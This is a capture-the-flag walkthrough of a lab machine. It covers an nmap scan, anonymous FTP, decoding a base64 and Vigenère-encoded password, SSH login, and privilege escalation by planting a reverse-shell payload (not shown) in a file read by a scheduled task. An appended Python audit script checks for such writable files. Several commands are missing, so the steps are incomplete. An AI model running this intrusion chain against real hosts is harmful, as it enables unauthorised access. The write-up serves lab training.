# Nmap 7.94 scan initiated Tue Jan 16 14:51:09 2024 as: nmap -sC -sV -oN nmap -vv 10.10.252.99
Increasing send delay for 10.10.252.99 from 0 to 5 due to 11 out of 27 dropped probes since last increase.
Nmap scan report for 10.10.252.99
Host is up, received syn-ack (0.37s latency).
Scanned at 2024-01-16 14:51:10 PST for 112s
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 396 May 25 2020 dad_tasks
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.9.135.209
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dd:fd:88:94:f8:c8:d1:1b:51:e3:7d:f8:1d:dd:82:3e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDn+KLEDP81/6ceCvdFeDrLFYWSWc6UnOmmpiNeXuyr+GRvE5Eff4DOeTbiEIcHQkkPcz2QXiOLd9SMjCEgAqmZiZE/mv1HJpQfmRLOufOlf9oZ1TIZf7ehKcVqX0W3nuQeC+M2wLBse2lGhovnTSaZKLKRjQCP2yD1EzND/xFA88oFpahvr6vJfyGOTADjc83AJq9n3Gnil4Nd88xNsIKTl01Mm9ikE/3n/XFbwzYa2bYJRVr+lWWRd+EU3sYTY80PQgBiw6ZPT0QCe0lQfmcgCqu4hC+t/kyfmMRlbtjN/yZJ0gCWeVVAV+A4NNgsOqFbXUT+c6ATzYNhBXRojJED
| 256 3e:ba:38:63:2b:8d:1c:68:13:d5:05:ba:7a:ae:d9:3b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBA3G1rdbZBOf44Cvz2YGtC5WhIHfHQhtShY8miCVHayvHM/9reA8VvLx9jBOa+iClhm/HairgvNV6pYV6Jg6MII=
| 256 c0:a6:a3:64:44:1e:cf:47:5f:85:f6:1f:78:4c:59:d8 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFiTPEbVpYmF2d/NDdhVYlXWA5PmTHhtrtlAaTiEuZOj
80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Nicholas Cage Stories
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 16 14:53:02 2024 -- 1 IP address (1 host up) scanned in 112.67 seconds
ftp 10.10.252.99 21
The file looks like it is base64 encoded.
Then I decode it in the terminal:
echo "" | base64 -d
Then we put the decoded text into an online cipher analyzer to identify what kind of cipher it is.
It looks like a Vigenère cipher, so we find a solver for it.
Once we find the decoded cipher text
Now we have a password, which is "Mydadisghostrideraintthatcoolnocausehesonfirejokes"
Then we SSH in as user weston:
ssh weston@10.10.252.132
Then run it on the victim machine
As we can see here, this is the content of the Python file
Or we can use this command to find the files that belong to user cage:
find / -user cage 2> /dev/null
Then move to the directory
Then we edit the .quotes file,
delete all of its contents and put this in:
This creates a reverse shell, and we get a shell as user cage.
But of course we need to wait for the task to execute the file.
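
An added defensive check, not part of the original write-up: the last steps work because weston can edit a file that a task running as cage later reads. The Python below lists entries owned by one account that group or world can write, which is the condition to remove. The directory and script names, and the assumption that .quotes is group-writable, are constructed for illustration.

```python
import os
import stat
import tempfile


def audit_owner_writes(root, owner_uid):
    """Return sorted (path, reason) for entries owned by owner_uid that others can modify."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # entry vanished or is unreadable; skip it
            if stat.S_ISLNK(st.st_mode) or st.st_uid != owner_uid:
                continue
            mode = stat.S_IMODE(st.st_mode)
            # Sticky directory: others can add entries but not replace existing ones.
            if stat.S_ISDIR(st.st_mode) and mode & stat.S_ISVTX:
                continue
            if mode & stat.S_IWOTH:
                findings.append((path, "world-writable"))
            elif mode & stat.S_IWGRP:
                findings.append((path, "group-writable"))
    return sorted(findings)


def demo():
    """Audit a constructed tree that mimics a job script reading a data file."""
    with tempfile.TemporaryDirectory() as root:
        job_dir = os.path.join(root, "jobdata")    # hypothetical directory name
        os.mkdir(job_dir)
        os.chmod(job_dir, 0o755)
        quotes = os.path.join(job_dir, ".quotes")  # file name taken from the page
        script = os.path.join(job_dir, "job.py")   # hypothetical script name
        for path, mode in ((quotes, 0o664), (script, 0o644)):
            with open(path, "w") as fh:
                fh.write("constructed sample\n")
            os.chmod(path, mode)                   # assumed permissions
        found = audit_owner_writes(root, os.getuid())
        return [(os.path.relpath(p, root), why) for p, why in found]


if __name__ == "__main__":
    for path, why in demo():
        print(f"{why}: {path}")
```

Any file this reports that a scheduled job passes to a shell or interpreter should be made writable by its owner only, or the job should stop trusting its contents.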